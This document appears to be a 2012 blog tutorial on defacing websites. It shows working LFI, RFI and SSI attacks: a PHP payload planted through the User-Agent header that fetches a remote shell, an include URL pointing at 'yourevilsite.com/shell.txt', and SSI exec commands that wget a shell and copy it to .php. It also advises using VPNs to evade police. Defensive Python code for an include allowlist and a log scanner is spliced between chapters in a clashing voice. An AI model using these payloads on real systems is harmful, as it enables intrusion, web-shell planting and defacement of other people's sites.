Wednesday, November 7, 2012

Advanced Exploitation Techniques


Table of Contents
Chapter I: Recon
Chapter II: Getting the tools ready
Chapter III: Getting your ass safe
Chapter IV: Local File Inclusion
Chapter V: Remote File Inclusion
Chapter VI: Server Side Inclusion
Chapter VII: Last word


Chapter I: Recon

Alright, imagine this: you are a Navy SEAL, ready to strike Osama bin Laden's house. But.... you haven't prepared any strategy or plan, and you haven't found a single flaw in the house's security. I bet you could tell me what's going to happen with the mission: COMPLETE FAILURE.
Always plan, plan and don't forget... plan. Let me explain briefly what I mean by planning. The art of planning is basically gathering information about your target. The information I always collect is: the OS, the CMS it is running, and whether there are any open ports. After I have gathered that information I usually perform a Paros Proxy scan on the site. Basically all it does is scan the site for vulnerabilities and make up a fancy report.
If you want to download and use Paros for yourself, be my guest.
Alright now.. I assume that you have the following information:
an idea which ports are open on the target, the operating system, the CMS the server might be running (not necessary) and your Paros Proxy report. That's basically all the information you need to determine which kind of attack you are going to use against the target.

Chapter II: Tools

Like every job there is, you will need tools.
We hackers need only a very small amount of tools to complete our main goal, which is exploiting that one website you wish to deface.
Alright, throughout this tutorial we are not going to use fancy tools.
Instead we will be using these key tools: your brain, your hands and, last but certainly not least.... Firefox.
Make sure that you have either HTTP Headers or Tamper Data installed as a Firefox plugin.


Chapter III: Safety

In a world where people hack targets, you have another group of people. I bet you feel this coming.... the police.
Trust me on this one: once you start hacking big sites, the police will try to get your ass. But not when we are around. We can outsmart the police by using a VPN. VPN stands for Virtual Private Network. Basically it's a server you can connect to, which will intercept all your packets and route them through their server. All that it does is hide your real IP.
Some free VPNs are: Cyberghost, VPNreactor and nProx.
Once you move on to the bigger sites, I would highly recommend getting a paid VPN like vpntunnel or anonine.


Chapter IV: Local File Inclusion

Most of you have probably heard about this method once or twice. This is the so-called "LFI" exploitation method.
LFI can occur on sites with a URL like this:

Code:
http://site.com/index.php?page=
When you perform an LFI attack you attempt to climb out through the server's directories and end up at /proc/self/environ. This can be done with ../../../proc/self/environ or if the ../. Useless, you say? WELL, I couldn't disagree more with you on that one. At first sight /proc/self/environ looks like a bunch of shit.
It will look something like this:


Code:
TMPDIR=/var/chroot/home/content/23/8340423/tmpPHPRC=/var/chroot/home/content/23/8340423/htmlTEMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_CHILDREN=0PATH=/usr/local/bin:/usr/bin:/binPWD=/web/cgi-binSHLVL=0RAILS_ENV=productionSPI=TRUETMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_MAX_REQUESTS=100000
But there is something really cool we can do with this.
We can spawn a shell through this file...
Now I've got your attention, right? Good. To spawn a shell we simply open up Tamper Data and reload the page while tampering.
Once you see a little message pop up, click Tamper Data.
Now we will notice a little User-Agent tab.
In there we will type the following code:

PHP Code:
<?php
$shell = '';                                  // initialise first; the original left this out
$file = fopen("shellname.php", "w+");         // local file that will receive the shell
$stream = fopen("Link your shell here/shell.txt", "r");
while (!feof($stream)) {
    $shell .= fgets($stream);                 // read the remote .txt line by line
}
fwrite($file, $shell);
fclose($file);
?>
Thanks to Legit for that code. Works better than mine with system();
Now once you have done that, click the submit button and your shell should be spawned. To check if it worked go to http://site.com/shell.php and voila.


Chapter V: Remote File Inclusion

I'm not very glad to say it, but this is one of the good exploit methods that has died. There are almost no websites that still have this vulnerability. That's because it's so easy to fix and yet so harmful.
I will explain the so-called "RFI" briefly.
RFI, or remote file inclusion, is a technique where you exploit the include() function.
RFI and LFI are quite similar, but there's a catch: "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
For example: a site includes PHP scripts in an unprotected manner.
A little bit like this:
PHP Code:
<?php
$color = 'blue';
if (isset($_GET['COLOR'])) {
    $color = $_GET['COLOR'];
}
include($color . '.php');
?>

Now to exploit this we will request the following URL:

Code:
http://site.com/index.php?page=http://yourevilsite.com/shell.txt

Now you are wondering.. why the hell did he use a .txt shell?
PHP automatically treats the included .txt as .php, which results in a nice shell to own/deface the website.
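The include handler that chapters IV and V go after can be closed off on the server side. The following Python model is an added example, not code from this post: `naive_resolve` mirrors the `include($color . '.php')` pattern shown above, and `hardened_resolve` shows the fix (an allowlist of page names plus a real-path containment check). `TEMPLATE_DIR`, `ALLOWED_PAGES` and the two page files are constructed for the demonstration; the model only covers path handling and does not reproduce PHP's remote-include behaviour.

```python
"""Hardened page-include resolver: a model of the index.php?page= handler.

Added example, not code from the post. naive_resolve mirrors the
include($color . '.php') pattern; hardened_resolve allowlists page names and
confines the result to TEMPLATE_DIR. The directory and its two pages are
constructed here so the module runs stand-alone.
"""
import os
import tempfile

TEMPLATE_DIR = tempfile.mkdtemp(prefix="pages_")      # constructed template dir
ALLOWED_PAGES = frozenset(("home", "about"))           # constructed allowlist

for _name in ALLOWED_PAGES:
    with open(os.path.join(TEMPLATE_DIR, _name + ".php"), "w") as fh:
        fh.write("<?php echo '%s'; ?>\n" % _name)


def _template_root():
    """Canonical template directory with a trailing separator, for prefix checks."""
    return os.path.realpath(TEMPLATE_DIR) + os.sep


def naive_resolve(page):
    """The vulnerable pattern: user input is glued straight into the path."""
    return os.path.join(TEMPLATE_DIR, page + ".php")


def escapes_template_dir(path):
    """True when a resolved path lands outside TEMPLATE_DIR (what LFI relies on)."""
    return not os.path.realpath(path).startswith(_template_root())


def hardened_resolve(page):
    """Return the absolute template path for an allowlisted page, else None."""
    # 1. A scheme in the value is a remote include attempt (chapter V); a local
    #    template name never contains one.
    if "://" in page:
        return None
    # 2. Allowlist: compare against known names, never against the filesystem.
    if page not in ALLOWED_PAGES:
        return None
    # 3. Defence in depth: even an allowlisted name must resolve inside the
    #    template directory, so a sloppy future allowlist entry cannot escape.
    candidate = os.path.realpath(os.path.join(TEMPLATE_DIR, page + ".php"))
    if not candidate.startswith(_template_root()):
        return None
    return candidate


if __name__ == "__main__":
    for value in ("home", "../../../proc/self/environ",
                  "http://yourevilsite.com/shell.txt"):
        print("%-36s naive=%s hardened=%s" % (
            value, naive_resolve(value), hardened_resolve(value)))
```

The allowlist does the real work: the traversal string from chapter IV and the remote URL from chapter V are both rejected before any filesystem call happens. The `realpath` prefix check is there as a second layer, so the resolver stays safe even if someone later adds an allowlist entry containing a separator.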

Chapter VI: Server Side Inclusion

Okay, now we move on to the "harder" methods.
Server Side Inclusion, or SSI, is an advanced technique that exploits vulnerabilities in the HTML code.
All that this means is that you inject script into HTML forms, which results in spawning a shell or doing something worse.
SSI can only be performed on a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is something else to keep in mind: SSI will also work on normal pages, but ONLY when the input is not filtered.
For example, we have a little textbox which is vulnerable to SSI.
We can run some nice little commands here, for example:

Code:
<!--#exec cmd="cd \admin\dir" -->
<!--#exec cmd="wget http://www.yoursite.com/youknowwutthisis.txt" -->
I will explain these 2 commands to you for a moment.
The first command lets you browse directories that you can't access without administrator privileges. The second command lets you download your shell onto the website (this is the shit we are interested in).
Then the only thing left for you to do is to locate your file by executing this command:

Code:
<!--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->
This basically copies your shell.txt as a .php file and places it in the directory of your choice.
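From the defender's side, all three request shapes in chapters IV to VI leave recognisable traces in the web server's access log. The following Python scanner is an added example, not code from this post: it parses Apache combined-format lines and flags traversal towards /proc/self/environ (LFI), a remote URL in a query parameter (RFI), an `<!--#` directive in submitted data (SSI) and a PHP open tag in the User-Agent or Referer (the chapter IV trick). The lines in `SAMPLE_LOG` are constructed, using 203.0.113.0/24 documentation addresses; `yourevilsite.com` is the placeholder host the post itself uses.

```python
"""Access-log scanner for the request patterns in chapters IV to VI.

Added example, not code from the post. Parses Apache combined-format lines
and tags each request with the attack class its query string or headers
resemble. SAMPLE_LOG is constructed for the demonstration.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (documentation IPs, placeholder host from the post).
SAMPLE_LOG = """\
203.0.113.5 - - [07/Nov/2012:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Nov/2012:10:00:02 +0000] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Nov/2012:10:00:03 +0000] "GET /index.php?page=http://yourevilsite.com/shell.txt HTTP/1.1" 200 99 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Nov/2012:10:00:04 +0000] "GET /guestbook.shtml?msg=%3C%21--%23exec+cmd%3D%22id%22+--%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Nov/2012:10:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 480 "-" "<?php echo 1; ?>"
"""

# Apache "combined" format: ip ident user [ts] "method target proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Traversal sequences (either slash style) or the file chapter IV aims for.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]|/proc/self/environ", re.IGNORECASE)
# A URL scheme at the start of a parameter value: what RFI needs include() to see.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def classify_value(value):
    """Tag one decoded parameter value with the attack classes it resembles."""
    tags = set()
    # Decode once more so double-encoded traversal (%252e%252e%252f) is caught too.
    decoded = unquote(value)
    if TRAVERSAL_RE.search(decoded):
        tags.add("LFI")
    if SCHEME_RE.match(decoded):
        tags.add("RFI")
    if "<!--#" in decoded:
        tags.add("SSI")
    return tags


def analyze_line(line):
    """Return (ip, target, sorted tags) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    tags = set()
    query = urlsplit(m.group("target")).query
    for _, value in parse_qsl(query, keep_blank_values=True):
        tags |= classify_value(value)
    # Chapter IV plants PHP in the User-Agent so /proc/self/environ carries it.
    headers = (m.group("ua") + " " + m.group("referer")).lower()
    if "<?php" in headers:
        tags.add("PHP-in-header")
    return m.group("ip"), m.group("target"), sorted(tags)


def scan_log(text):
    """Return only the flagged requests as a list of (ip, target, tags)."""
    hits = []
    for line in text.splitlines():
        result = analyze_line(line)
        if result is not None and result[2]:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for ip, target, tags in scan_log(SAMPLE_LOG):
        print(ip, ",".join(tags), target)
```

Run against `SAMPLE_LOG` it reports four of the five requests; the first (`page=home`) is clean. The scanner works on the decoded parameter values rather than the raw URL so that URL-encoded SSI directives such as the `%3C%21--%23exec` form in the fourth line are still recognised, and the header check covers the User-Agent route the post uses to get PHP into /proc/self/environ.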

Chapter VII: Last things

Well, this was my little tutorial regarding uncommon forms of attack.
I hope you have learned something from it, and I hope to hear your personal experiences with this.
If this helped you, please leave any form of thank you. It's highly appreciated.
